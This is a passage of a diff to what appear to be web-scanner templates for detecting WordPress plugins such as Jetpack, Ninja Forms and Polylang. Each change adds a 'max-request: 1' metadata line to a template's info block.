+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
